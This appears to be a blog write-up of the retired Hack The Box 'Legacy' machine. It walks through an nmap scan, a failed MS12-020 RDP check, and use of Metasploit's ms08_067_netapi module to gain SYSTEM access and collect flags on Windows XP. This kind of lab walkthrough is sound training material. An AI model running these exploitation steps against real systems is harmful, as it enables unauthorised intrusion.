htb machine

Since i had a vip connection ,i am trying to solve as many as retired machines.So let’s get started.

The IP of this box is

Results of NMAP {Network Mapper} scan:

COMMAND: nmap -sC -sV -oN legacy

We see only 3 ports open here currently , Port 139 running NetBios , Port 445 running Microsoft-Ds and Port 3389 running ms-wbt server

We also got an information about the operating system here , that is Microsoft Windows XP.

RDP Port Exploit Check

As we see that the Port 3389 is open , which is RDP{Remote Desktop Protocaol} , so we try to check whether it is exploitable or not with ms12_020 in msfconsole

We use the auxiliary/scanner/rdp/ms12_020_check.

COMMAND: use auxiliary/scanner/rdp/ms12_020_check


Unfortunately, the exploit didnt worked and lets check other services running on the machine


So we remember the exploit was MS08–067 NetAPI from msf , so lets try it by using this module in the metasploit

COMMAND: use exploit/windows/smb/ms08_067_netapi

We see that we have NT Authority\SYSTEM , which means we have Administrator Access

Let’s get the user and root flags

User Flags are usually located at the Desktop Folder of the user

Before that we get the shell access using the shell command on meterpreter

COMMAND: shell


So,here is the flags ,its a beginner friendly box .

If you like my writeup , Give me Respect on my HTB profile : Exp1o1t9r


Please enter your comment!
Please enter your name here